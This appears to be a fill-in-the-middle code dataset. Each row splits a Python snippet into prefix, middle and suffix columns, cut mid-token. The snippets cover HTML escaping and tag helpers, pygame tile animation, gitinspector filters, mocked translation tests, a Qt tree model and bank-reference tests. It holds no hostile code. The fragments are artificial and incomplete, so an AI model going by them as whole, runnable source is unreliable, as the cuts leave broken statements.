prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
are nice values.
@type replacechar: string
@param remove_escaped_chars_p: If True, also remove escaped characters
like '&', '<', '>' and '"'.
@type remove_escaped_chars_p: boolean
@return: Input text with HTML markup removed.
@rtype: string
"""
if not remove_escaped_chars_p:
return RE_HTML_WITHOUT_ESCAPED_CHARS.sub(replacechar, text)
return RE_HTML.sub(replacechar, text)
def unescape(s, quote=False):
    """
    The opposite of the cgi.escape function.

    Replace the HTML entities '&amp;', '&lt;' and '&gt;' with the
    corresponding regular characters '&', '<' and '>'.  If the optional
    flag quote is true, the escaped quotation mark entity ('&quot;') is
    also translated.

    @param s: the escaped text.
    @type s: string
    @param quote: if True, also translate '&quot;' back to '"'.
    @type quote: boolean
    @return: the unescaped text.
    @rtype: string
    """
    s = s.replace('&lt;', '<')
    s = s.replace('&gt;', '>')
    if quote:
        s = s.replace('&quot;', '"')
    # '&amp;' must be translated LAST, otherwise input such as
    # '&amp;lt;' would be wrongly double-unescaped to '<'.
    s = s.replace('&amp;', '&')
    return s
class EscapedString(str):
    """
    Marker subclass of str used by the MLClass machinery in order to
    distinguish native strings from strings that are already escaped
    and therefore must not be escaped a second time.
    """
    pass
class EscapedHTMLString(EscapedString):
"""
This class automatically escape a non-escaped string used to initialize
it, using the HTML escaping method (i.e. cgi.escape).
"""
def __new__(c | ls, original_string='', escape_quotes=False):
if isinstance(original_string, EscapedString):
escaped_string = str(original_string)
else:
if original_string and not str(original_string).strip():
escaped_string = ' '
else:
escaped_string = cgi.escape(str(original_string), escape_quotes)
obj = str.__new__(cls, escaped_string)
obj.original_string = original_ | string
obj.escape_quotes = escape_quotes
return obj
def __repr__(self):
return 'EscapedHTMLString(%s, %s)' % (repr(self.original_string), repr(self.escape_quotes))
def __add__(self, rhs):
return EscapedHTMLString(EscapedString(str(self) + str(rhs)))
class EscapedXMLString(EscapedString):
    """
    String subclass whose constructor XML-escapes any plain input
    (via encode_for_xml).  Values that are already EscapedString
    instances are taken verbatim, never escaped twice.
    """

    def __new__(cls, original_string='', escape_quotes=False):
        if isinstance(original_string, EscapedString):
            # Already escaped upstream: trust it as-is.
            washed = str(original_string)
        elif original_string and not str(original_string).strip():
            # Whitespace-only input collapses to a single blank.
            washed = ' '
        else:
            washed = encode_for_xml(str(original_string), wash=True, quote=escape_quotes)
        instance = str.__new__(cls, washed)
        # Keep the raw input around for __repr__ / round-tripping.
        instance.original_string = original_string
        instance.escape_quotes = escape_quotes
        return instance

    def __repr__(self):
        return 'EscapedXMLString(%s, %s)' % (repr(self.original_string), repr(self.escape_quotes))

    def __add__(self, rhs):
        # Concatenation of two already-escaped strings is still escaped.
        return EscapedXMLString(EscapedString(str(self) + str(rhs)))
def create_tag(tag, escaper=EscapedHTMLString, opening_only=False, body=None, escape_body=False, escape_attr=True, indent=0, attrs=None, **other_attrs):
    """
    Create an XML/HTML tag.

    This function create a full XML/HTML tag, putting toghether an
    optional inner body and a dictionary of attributes.

    @param tag: the tag (e.g. "select", "body", "h1"...).
    @type tag: string
    @param escaper: class used to escape attribute values (and the body
        when escape_body is set); defaults to HTML escaping.
    @type escaper: EscapedString subclass
    @param opening_only: if True, emit only the opening tag (no "/>"
        self-closing form and no closing tag).
    @type opening_only: boolean
    @param body: some text/HTML to put in the body of the tag (this
        body will be indented WRT the tag).
    @type body: string
    @param escape_body: wether the body (if any) must be escaped.
    @type escape_body: boolean
    @param escape_attr: wether the attribute values (if any) must be
        escaped.
    @type escape_attr: boolean
    @param indent: number of level of indentation for the tag.
    @type indent: integer
    @param attrs: map of attributes to add to the tag.
    @type attrs: dict
    @param other_attrs: additional attributes given as keyword
        arguments; a trailing underscore is stripped from the name
        (e.g. class_ -> class) so Python reserved words can be used.
    @return: the HTML tag.
    @rtype: EscapedString
    """
    if attrs is None:
        attrs = {}
    for key, value in other_attrs.iteritems():
        if value is not None:
            # Strip the trailing underscore used to dodge reserved words.
            if key.endswith('_'):
                attrs[key[:-1]] = value
            else:
                attrs[key] = value
    out = "<%s" % tag
    for key, value in attrs.iteritems():
        if escape_attr:
            value = escaper(value, escape_quotes=True)
        out += ' %s="%s"' % (key, value)
    if body is not None:
        # A lazily-built body (see MLClass) is rendered here.
        if callable(body) and body.__name__ == 'handle_body':
            body = body()
        out += ">"
        if escape_body and not isinstance(body, EscapedString):
            body = escaper(body)
        out += body
        if not opening_only:
            out += "</%s>" % tag
    elif not opening_only:
        # No body and not opening-only: self-closing tag.
        out += " />"
    if indent:
        out = indent_text(out, indent)[:-1]
    return EscapedString(out)
class MLClass(object):
    """
    Swiss army knife to generate XML or HTML strings a la carte.

    >>> from invenio.htmlutils import X, H
    >>> X.foo()()
    ... '<foo />'
    >>> X.foo(bar='baz')()
    ... '<foo bar="baz" />'
    >>> X.foo(bar='baz&pi')()
    ... '<foo bar="baz&amp;pi" />'
    >>> X.foo("<body />", bar='baz')
    ... '<foo bar="baz"><body /></foo>'
    >>> X.foo(bar='baz')(X.body())
    ... '<foo bar="baz"><body /></foo>'
    >>> X.foo(bar='baz')("<body />") ## automatic escaping
    ... '<foo bar="baz">&lt;body /&gt;</foo>'
    >>> X.foo()(X.p(), X.p()) ## magic concatenation
    ... '<foo><p /><p /></foo>'
    >>> X.foo(class_='bar')() ## protected keywords...
    ... '<foo class="bar" />'
    >>> X["xml-bar"]()()
    ... '<xml-bar />'
    """

    def __init__(self, escaper):
        ## Escaping class (e.g. EscapedHTMLString) applied to any
        ## non-escaped body passed to a generated tag.
        self.escaper = escaper

    def __getattr__(self, tag):
        ## Attribute access fabricates a tag factory on the fly.
        def tag_creator(body=None, opening_only=False, escape_body=False, escape_attr=True, indent=0, attrs=None, **other_attrs):
            if body:
                ## Body supplied up front: render immediately.
                return create_tag(tag, body=body, opening_only=opening_only, escape_body=escape_body, escape_attr=escape_attr, indent=indent, attrs=attrs, **other_attrs)
            else:
                ## No body yet: return a callable that accepts any
                ## number of bodies later (lazy rendering; create_tag
                ## recognizes it by its __name__).
                def handle_body(*other_bodies):
                    full_body = None
                    if other_bodies:
                        full_body = ""
                        for body in other_bodies:
                            if callable(body) and body.__name__ == 'handle_body':
                                ## A nested, not-yet-rendered tag.
                                full_body += body()
                            elif isinstance(body, EscapedString):
                                full_body += body
                            else:
                                ## Plain string: escape before embedding.
                                full_body += self.escaper(str(body))
                    return create_tag(tag, body=full_body, opening_only=opening_only, escape_body=escape_body, escape_attr=escape_attr, indent=indent, attrs=attrs, **other_attrs)
                return handle_body
        return tag_creator

    ## X["xml-bar"] form, for tag names that are not valid identifiers.
    __getitem__ = __getattr__
## Ready-made factories: H emits HTML-escaped markup, X XML-escaped markup.
H = MLClass(EscapedHTMLString)
X = MLClass(EscapedXMLString)
def create_html_select(options, name=None, selected=None, disabled=None, multiple=False, attrs=None, **other_attrs):
"""
Create an HTML select box.
>>> print create_html_select(["foo", "bar"], selected="bar", name="baz")
<select name="baz">
<option selected="selected" value="bar">
bar
</option>
<option value="foo">
foo
</option>
</select>
>>> print create_html_select([("foo", "oof"), ("bar", "rab")], selected="bar", name="baz")
<select name="baz">
<option value="foo">
oof
</option>
<option selected="selected" value="bar">
rab
</option>
</select>
@param options: this can either be a sequence of strings, or a sequence
of couples or a map of C{key->value}. In the former case, the C{select}
tag will contain a list of C{option} tags (in alphabetical order), |
_x-w//2,delta_y-h//2))
## images.append(result)
## if reverse:
## images += images[::-1][1:-1]
## return images
def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True):
    """Return nframes copies of img, each scrolled by a wrapping offset.

    With sin=True the offset oscillates sinusoidally over the frame
    cycle (amplitudes dx, dy in pixels); otherwise it grows linearly by
    (dx, dy) per frame.  Each frame blits the image four times so it
    wraps seamlessly at the tile edges.  With reverse=True, the frame
    list minus its two endpoints is appended reversed (ping-pong loop).
    """
    r = img.get_rect()
    w,h = r.size
    images = []
    for i in range(nframes):
        if sin:
            delta_x = dx*math.sin(2.*math.pi*i/float(nframes))
            delta_y = dy*math.sin(2.*math.pi*i/float(nframes))
        else:
            delta_x = i*dx
            delta_y = i*dy
##            print(delta_x,w)
##            assert abs(delta_x) <= w
##            assert abs(delta_y) <= h
        result = pygame.Surface(r.size)
        # Wrapped copies go on the opposite side of the shift direction.
        xsgn, ysgn = 1, 1
        if delta_x>0:
            xsgn = -1
        if delta_y>0:
            ysgn = -1
        # One blit at the shifted position plus three wrapped copies so
        # no uncovered strip remains on the surface.
        result.blit(img,r.move(delta_x,delta_y))
        result.blit(img,r.move(delta_x,delta_y+ysgn*h))
        result.blit(img,r.move(delta_x+xsgn*w,delta_y))
        result.blit(img,r.move(delta_x+xsgn*w,delta_y+ysgn*h))
        images.append(result)
    if reverse:
        images += images[::-1][1:-1]
    return images
def build_tiles(img_fullsize, sizes, nframes, dx_divider=0, dy_divider=0,
                reverse=False, sin=True, colorkey=None):
    """Returns a list of list of images on the form : imgs[size][frame]"""
    frames_per_size = []
    for size in sizes:
        # smoothscale is important here, otherwise FAST should always be True
        scaled = pygame.transform.smoothscale(img_fullsize, (size,)*2)
        # Shift amplitude is a fraction of the tile size; 0 disables it.
        shift_x = int(size/dx_divider) if dx_divider else 0
        shift_y = int(size/dy_divider) if dy_divider else 0
        frames_per_size.append(
            get_shifted_tiles(scaled, nframes, shift_x, shift_y, reverse, sin))
    if colorkey:
        for frames in frames_per_size:
            for frame in frames:
                frame.set_colorkey(colorkey)
    return frames_per_size
def build_color_tiles(color, sizes, nframes, reverse=False, sin=True):
    """Like build_tiles, but from flat single-colour squares
    (no scrolling offset)."""
    frames_per_size = []
    for side in sizes:
        square = pygame.Surface((side,)*2)
        square.fill(color)
        frames_per_size.append(get_shifted_tiles(square, nframes, 0, 0, reverse, sin))
    return frames_per_size
def get_radiuses(nframes, initial_value, increment, reverse=False, sin=True):
    """Return one integer radius per frame.

    sin=True: start from initial_value and add a sinusoidal delta each
    frame; sin=False: start from 0 and add `increment` each frame.
    reverse=True replaces the result by its reversal with both end
    values dropped.
    """
    current = initial_value if sin else 0
    values = []
    for frame in range(nframes):
        if sin:
            current += increment * math.sin(2. * math.pi * frame / float(nframes))
        else:
            current += increment
        values.append(int(current))
    if reverse:
        values = values[::-1][1:-1]
    return values
def build_tilers(grasses, waters, radius_divider, use_beach_tiler):
    """Build one tiler per (zoom level, frame).

    grasses/waters are frame images indexed [zoom][frame].  With
    use_beach_tiler a BeachTiler is built from each (grass, water)
    frame pair with corner radius cell_size//radius_divider; otherwise
    a BaseTiler from the grass frame alone.  Returns tilers indexed
    [zoom][frame].
    """
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom):
        # Tile size at this zoom level comes from the first grass frame.
        cell_size = grasses[z][0].get_width()
        radius = cell_size//radius_divider
        for n in range(nframes):
            if use_beach_tiler:
                tiler = BeachTiler(grasses[z][n], waters[z][n])
                tiler.make(size=(cell_size,)*2, radius=radius)
            else:
                tiler = BaseTiler(grasses[z][n])
                tiler.make(size=(cell_size,)*2, radius=0)
            tilers[z][n] = tiler
    return tilers
def build_static_tilers(grasses, waters, radius_divider, use_beach_tiler):
    """Like build_tilers, but builds a single tiler per zoom level
    (from frame 0) and shares it across every frame slot — for
    non-animated materials."""
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom):
        cell_size = grasses[z][0].get_width()
        radius = cell_size//radius_divider
        if use_beach_tiler:
            tiler = BeachTiler(grasses[z][0], waters[z][0])
            tiler.make(size=(cell_size,)*2, radius=radius)
        else:
            tiler = BaseTiler(grasses[z][0])
            tiler.make(size=(cell_size,)*2, radius=0)
        # Every frame of a static material points at the same tiler.
        for n in range(nframes):
            tilers[z][n] = tiler
    return tilers
def build_tilers_fast(grasses, waters, radius_divider, use_beach_tiler):
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
cell_size = grasses[0][0].get_width()
radius = cell_size//radius_divider
for n in range(nframes):
if use_beach_tiler:
tiler = BeachTiler(grasses[0][n], waters[0][n])
tiler.make(size=(cell_size,)*2, radius=radius)
else:
tiler = BaseTiler(grasses[0][n])
tiler.make(size=(cell_size,)*2, radius=0)
tilers[0][n] = tiler
if nzoom > 1:
for z in range(1,nzoom):
for n in range(nframes):
if use_beach_tiler:
tiler = BeachTiler(grasses[z][n], waters[z][n])
else:
tiler = BaseTiler(grasses[z][n])
size = grasses[z][n].get_size()
ref = tilers[0][n]
for key in ref.imgs:
tiler.imgs[key] = pygame.transform.scale(ref.imgs[key], size)
tilers[z][n] = tiler
re | turn tilers
def load_tilers_dynamic(i, grasses, waters, | folder): #pour static, nframes=1
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom): #PEUT ETRE LARGEMENT OPTIMIZE VU QUE ON POURRAIT LOADER UNE SEULE FOIS CHAQUE IMAGE, A LA PLACE DE z FOIS
cell_size = grasses[z][0].get_width()
for n in range(nframes):
basename = os.path.join(folder,str(i)+"_"+str(n)+"_")
tilers[z][n] = LoadTiler(basename, (cell_size,)*2)
return tilers
def load_tilers_static(i, grasses, waters, folder): # for static materials, nframes=1
    """Load one pre-rendered tiler per zoom level from disk (frame 0
    only) and share it across all frame slots.

    `i` identifies the material couple; files are expected at
    folder/<i>_0_* (see LoadTiler).
    """
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom): # COULD BE LARGELY OPTIMIZED: each image could be loaded once instead of z times
        cell_size = grasses[z][0].get_width()
        basename = os.path.join(folder,str(i)+"_"+str(0)+"_")
        tiler = LoadTiler(basename, (cell_size,)*2)
        for n in range(nframes):
            tilers[z][n] = tiler
    return tilers
def get_material_couples(materials, radius_divider, fast, use_beach_tiler,
                         load_tilers):
    """Sort materials by their height threshold and pair each two
    consecutive materials into a MaterialCouple.

    All materials must have the same number of frames; the zoom-0 cell
    size of the lowest material is used as the maximum cell size.
    Returns len(materials)-1 couples.
    """
    materials.sort(key=lambda x:x.hmax)
    couples = []
    imgs_zoom0_mat0 = materials[0].imgs[0]
    nframes = len(imgs_zoom0_mat0)
    max_cell_size = imgs_zoom0_mat0[0].get_width()
    for i in range(len(materials)-1):
        print(" Building tilers for couple", i)
        assert nframes == len(materials[i+1].imgs[0])
        couple = MaterialCouple(i, materials[i], materials[i+1], radius_divider,
                                max_cell_size, fast, use_beach_tiler, load_tilers)
        couples.append(couple)
    return couples
def get_couple(h, couples):
    """Pick the material couple whose grass height threshold bounds h.

    Negative heights map to the first couple; heights above every
    threshold map to the last one.
    """
    if h < 0.:
        return couples[0]
    for candidate in couples:
        if candidate.grass.hmax > h:
            return candidate
    return couples[-1]
class Material:
    """One terrain material: a name, the upper height threshold below
    which it is used (see get_couple), and its images."""

    def __init__(self, name, hmax, imgs, static):
        self.name = name
        # Upper height bound for this material (couples are sorted by it).
        self.hmax = hmax
        # Frame images, indexed [zoom][frame] (see get_material_couples).
        self.imgs = imgs
        # True when the material is not animated.
        self.static = static
class MaterialCouple:
def __init__(self, i, material1, material2, radius_divider, max_cell_size,
fast, use_beach_tiler, load_tilers):
if not has_surfarray and not load_tilers:
raise Exception("Numpy was no |
# coding: utf-8
#
# Copyright © 2012-2014 Ejwa Software. All rights reserved.
#
# This file is part of gitinspector.
#
# gitinspector is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# ( | at your option) any later version.
#
# gitinspector is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gitinspector. If not, see | <http://www.gnu.org/licenses/>.
from __future__ import print_function
from __future__ import unicode_literals
import re
import textwrap
from gitinspector.localization import N_
from gitinspector.outputable import Outputable
from gitinspector import terminal
# Registry: filter type -> [list of regex rule strings, set of matched items].
__filters__ = {"file": [[], set()], "author": [[], set()], "email": [[], set()]}
class InvalidRegExpError(ValueError):
    """Raised when a user-supplied exclusion pattern is not a valid
    regular expression."""

    def __init__(self, msg):
        super(InvalidRegExpError, self).__init__(msg)
        self.msg = msg
def get():
    """Return the module-wide filter registry (rules and matched sets)."""
    return __filters__
def __add_one__(string):
    """Store a single exclusion rule; a leading "file:"/"author:"/
    "email:" prefix selects the filter type, otherwise "file" is
    assumed."""
    for i in __filters__:
        if (i + ":").lower() == string[0:len(i) + 1].lower():
            __filters__[i][0].append(string[len(i) + 1:])
            return
    __filters__["file"][0].append(string)
def add(string):
    """Register every comma-separated exclusion rule found in `string`."""
    for rule in string.split(","):
        __add_one__(rule)
def clear():
    """Drop every registered exclusion rule.  NOTE(review): the sets of
    already-matched items are deliberately left untouched."""
    for filter_type in __filters__:
        __filters__[filter_type][0] = []
def get_filered(filter_type="file"):
    """Return the set of items already excluded for filter_type.
    (The misspelled name is kept for backward compatibility.)"""
    return __filters__[filter_type][1]
def has_filtered():
    """Return True if any filter type has matched at least one item."""
    return any(__filters__[key][1] for key in __filters__)
def set_filtered(string, filter_type="file"):
    """Match `string` against the stored rules for filter_type.

    On the first matching rule the string is recorded in the filter's
    matched set and True is returned; False means no rule matched.
    Raises InvalidRegExpError when a stored rule is not a valid regex.
    """
    string = string.strip()
    if len(string) > 0:
        for pattern in __filters__[filter_type][0]:
            try:
                if re.search(pattern, string) is not None:
                    __filters__[filter_type][1].add(string)
                    return True
            except re.error:
                # Only a malformed pattern is a user error; the previous
                # bare `except` also masked unrelated failures.
                raise InvalidRegExpError(_("invalid regular expression specified"))
    return False
# User-visible notices (wrapped in N_ for deferred gettext translation)
# printed when items were excluded by the configured patterns.
FILTERING_INFO_TEXT = N_(
    "The following files were excluded from the statistics due to the specified exclusion patterns")
FILTERING_AUTHOR_INFO_TEXT = N_(
    "The following authors were excluded from the statistics due to the specified exclusion patterns")
FILTERING_EMAIL_INFO_TEXT = N_(
    "The authors with the following emails were excluded from the statistics due to the specified exclusion patterns")
class Filtering(Outputable):
    """Report (text / HTML / XML) which files, authors and emails were
    excluded from the statistics by the configured patterns."""

    @staticmethod
    def __output_html_section__(info_string, filtered):
        """Return an HTML fragment listing `filtered`, or "" if empty."""
        filtering_xml = ""
        if filtered:
            filtering_xml += "<p>" + info_string + "." + "</p>"
            for i in filtered:
                filtering_xml += "<p>" + i + "</p>"
        return filtering_xml

    def output_html(self):
        if has_filtered():
            filtering_xml = "<div><div class=\"box\">"
            # Bug fix: the section fragments were computed but their
            # return values discarded, so the box printed empty.
            filtering_xml += Filtering.__output_html_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
            filtering_xml += Filtering.__output_html_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
            filtering_xml += Filtering.__output_html_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])
            filtering_xml += "</div></div>"
            print(filtering_xml)

    @staticmethod
    def __output_text_section__(info_string, filtered):
        """Print `filtered` to stdout, wrapped to the terminal width."""
        if filtered:
            print("\n" + textwrap.fill(info_string + ":", width=terminal.get_size()[0]))
            for i in filtered:
                (width, _unused) = terminal.get_size()
                # Long entries are left-truncated with a "..." marker.
                print("...%s" % i[-width + 3:] if len(i) > width else i)

    def output_text(self):
        Filtering.__output_text_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
        Filtering.__output_text_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
        Filtering.__output_text_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])

    @staticmethod
    def __output_xml_section__(info_string, filtered, container_tagname):
        """Print an XML section wrapping `filtered` in <container_tagname>."""
        if filtered:
            message_xml = "\t\t\t<message>" + info_string + "</message>\n"
            filtering_xml = ""
            for i in filtered:
                # Cleanup: the original called .format() on literals with
                # no placeholders — a no-op, now dropped.
                filtering_xml += "\t\t\t\t<entry>" + i + "</entry>\n"
            print("\t\t<{0}>".format(container_tagname))
            print(message_xml + "\t\t\t<entries>\n" + filtering_xml + "\t\t\t</entries>\n")
            print("\t\t</{0}>".format(container_tagname))

    def output_xml(self):
        if has_filtered():
            print("\t<filtering>")
            Filtering.__output_xml_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1], "files")
            Filtering.__output_xml_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1], "authors")
            Filtering.__output_xml_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1], "emails")
            print("\t</filtering>")
|
# -*- coding: utf-8 -*-
import os
from mock import Mock, patch
from maidchan.translate import get_trans_language_prediction, get_translation
SCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))
def _get_response(name):
    """Read test fixture `name` from the local data/ directory and
    return it UTF-8 encoded (bytes), mimicking subprocess output."""
    path = os.path.join(SCRIPT_PATH, 'data', name)
    with open(path) as f:
        return f.read().encode("utf-8")
def mocked_trans(*args, **kwargs):
"""
Mocked "trans"
"""
process_mock = Mock()
return_value = None
if '-id' in | args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_prediction.txt')
elif '-b' in args[0] and 'en:ja' in args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_translation.txt')
elif '-b' in args[0] and 'en:id' in args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_translation_2.txt')
attrs = {'communicate.return_value': (return_value, None | )}
process_mock.configure_mock(**attrs)
return process_mock
class TestTranslate:
    """Tests for maidchan.translate with the external "trans" command
    replaced by a canned-output mock (mocked_trans)."""

    @patch('subprocess.Popen', side_effect=mocked_trans)
    def test_get_translate_language_prediction(self, mock_trans):
        assert get_trans_language_prediction("hello, world!") == "en"

    @patch('subprocess.Popen', side_effect=mocked_trans)
    def test_get_translation_en_to_ja(self, mock_trans):
        query = "translate hello, world! from english to japanese"
        assert get_translation(query) == "こんにちは世界!"

    @patch('subprocess.Popen', side_effect=mocked_trans)
    def test_get_translation_en_to_default(self, mock_trans):
        # Target language omitted: the default target is exercised.
        query = "translate hello, world! from english"
        assert get_translation(query) == "こんにちは世界!"

    @patch('subprocess.Popen', side_effect=mocked_trans)
    def test_get_translation_default_to_id(self, mock_trans):
        # Source language omitted: detection path is exercised.
        query = "translate hello, world! to bahasa"
        assert get_translation(query) == "Halo Dunia!"
|
child.removeColumns(position, columns)
return True
def setData(self, column, value):
if column < 0 or column >= len(self.itemData):
return False
self.itemData[column] = value
return True
class TreeModel(QtCore.QAbstractItemModel):
    """Qt item model exposing two top-level groups (continuous and
    indicator cubes) through a TreeItem hierarchy.

    Fixes in this revision: reconstructed a garbled statement in
    flags(), removed a stray Python-2 debug print statement from
    setData() (a syntax error under Python 3), and narrowed its bare
    `except:` to `except Exception:`.
    """

    def __init__(self, headers, contCubes, indCubes, parent=None):
        super(TreeModel, self).__init__(parent)
        self.contCubes = contCubes
        self.indCubes = indCubes
        rootData = [header for header in headers]
        self.rootItem = TreeItem(rootData)
        # self.setupModelData(data.split("\n"), self.rootItem)

    def columnCount(self, parent=QtCore.QModelIndex()):
        return self.rootItem.columnCount()

    def data(self, index, role):
        """Return group icons for the two top-level rows, and stored
        text for display/edit roles."""
        if not index.isValid():
            return None
        if role == QtCore.Qt.DecorationRole:
            if self.getItem(index).parent() == self.rootItem:
                if index.column() == 0:
                    if index.row() == 0:
                        pixmap = QtGui.QPixmap()
                        pixmap.load(':/icons/cont.png')
                        pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio,
                                               transformMode=QtCore.Qt.SmoothTransformation)
                        return pixmap
                    if index.row() == 1:
                        pixmap = QtGui.QPixmap()
                        pixmap.load(':/icons/ind.png')
                        pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio,
                                               transformMode=QtCore.Qt.SmoothTransformation)
                        return pixmap
        if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.EditRole:
            item = self.getItem(index)
            return item.data(index.column())
        return None

    def flags(self, index):
        # Top-level group rows and columns 1-2 are read-only; everything
        # else is editable.
        parentItem = self.getItem(index).parent()
        if parentItem == self.rootItem:
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
        if index.column() == 1 or index.column() == 2:
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
        return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable

    def getItem(self, index):
        """Map a model index to its TreeItem (root for invalid indexes)."""
        if index.isValid():
            item = index.internalPointer()
            if item:
                return item
        return self.rootItem

    def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
        if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
            return self.rootItem.data(section)
        return None

    def index(self, row, column, parent=QtCore.QModelIndex()):
        if parent.isValid() and parent.column() != 0:
            return QtCore.QModelIndex()
        parentItem = self.getItem(parent)
        childItem = parentItem.child(row)
        if childItem:
            return self.createIndex(row, column, childItem)
        else:
            return QtCore.QModelIndex()

    def insertColumns(self, position, columns, parent=QtCore.QModelIndex()):
        self.beginInsertColumns(parent, position, position + columns - 1)
        success = self.rootItem.insertColumns(position, columns)
        self.endInsertColumns()
        return success

    def insertRows(self, position, rows, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)
        self.beginInsertRows(parent, position, position + rows - 1)
        success = parentItem.insertChildren(position, rows,
                                           self.rootItem.columnCount())
        self.endInsertRows()
        return success

    def parent(self, index):
        if not index.isValid():
            return QtCore.QModelIndex()
        childItem = self.getItem(index)
        parentItem = childItem.parent()
        if parentItem == self.rootItem:
            return QtCore.QModelIndex()
        return self.createIndex(parentItem.childNumber(), 0, parentItem)

    def removeColumns(self, position, columns, parent=QtCore.QModelIndex()):
        self.beginRemoveColumns(parent, position, position + columns - 1)
        success = self.rootItem.removeColumns(position, columns)
        self.endRemoveColumns()
        # With no columns left there is nothing meaningful to show.
        if self.rootItem.columnCount() == 0:
            self.removeRows(0, self.rowCount())
        return success

    def removeRows(self, position, rows, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)
        self.beginRemoveRows(parent, position, position + rows - 1)
        success = parentItem.removeChildren(position, rows)
        self.endRemoveRows()
        return success

    def rowCount(self, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)
        return parentItem.childCount()

    def setData(self, index, value, role=QtCore.Qt.EditRole):
        """Write an edited value back to the TreeItem and mirror name
        (column 0) / undef-value (column 3) changes into the matching
        cube collection (row 0 = continuous, row 1 = indicator)."""
        if role != QtCore.Qt.EditRole:
            return False
        item = self.getItem(index)
        try:
            result = item.setData(index.column(), value)
            if index.column() == 0:
                value = str(value.toString())
                if index.parent().row() == 0:
                    self.contCubes.setName(value, index.row())
                if index.parent().row() == 1:
                    self.indCubes.setName(value, index.row())
                result = True
            if index.column() == 3:
                value = int(value)
                if index.parent().row() == 0:
                    self.contCubes.changeUndefValue(value, index.row())
                if index.parent().row() == 1:
                    self.indCubes.changeUndefValue(value, index.row())
                result = True
        except Exception:
            # e.g. a non-numeric undef value: report an unsuccessful edit.
            result = False
        if result:
            self.dataChanged.emit(index, index)
        return result

    def setHeaderData(self, section, orientation, value, role=QtCore.Qt.EditRole):
        if role != QtCore.Qt.EditRole or orientation != QtCore.Qt.Horizontal:
            return False
        result = self.rootItem.setData(section, value)
        if result:
            self.headerDataChanged.emit(orientation, section, section)
        return result
#class MainWindow(QtGui.QWidget):
# def __init__(self, parent = None):
# QtGui.QWidget.__init__(self, parent)
#
# header = ['1', '2', '3']
# model = TreeModel(header)
#
# self.tree = QtGui.QTreeView()
# self.tree.setModel(model)
#
# vbox = QtGui.QVBoxLayout()
# self.setLayout(vbox)
# vbox.addWidget(self.tree)
#
# self.insertRow(['1', '2', '3'])
# self.insertRow(['4', '5', '6'])
#
# index = model.index(0, 0)
# print model.data(index, QtCore.Qt.DisplayRole)
# self.insertChild(['5', '15', '25'], index)
#
# def insertChild(self, data, index = None):
# if index == None:
# index = self.tree.selectionModel().currentIndex()
# model = self.tree.model()
#
# if not model.insertRow(0, index):
# return
#
# for column in range(model.columnCount(index)):
# child = model.index(0, column, index)
# model.setData(child, data[column], QtCore.Qt.EditRole)
#
# def insertRow(self, data, index = None):
# if index == None:
# index = self.tree.selectionModel().currentIndex()
# model = self.tree.model()
#
# if not model.insertRow(index.row()+1, index.parent()):
# return
#
# for column in range(model.columnCount(index |
# -*- coding: utf-8 -*-
import random
import pytest
from holviapi.utils import (
ISO_REFERENCE_VALID,
fin_reference_isvalid,
int2fin_reference,
iso_reference_isvalid,
str2iso_reference
)
def test_fin_reference_isvalid_valid_results():
    """Test handpicked, known-good inputs (valid Finnish bank reference
    numbers)."""
    assert fin_reference_isvalid(13)
    assert fin_reference_isvalid(107)
    assert fin_reference_isvalid(105523)
    assert fin_reference_isvalid(102319)
    assert fin_reference_isvalid(108326)
    assert fin_reference_isvalid(100816)
    assert fin_reference_isvalid(108724)
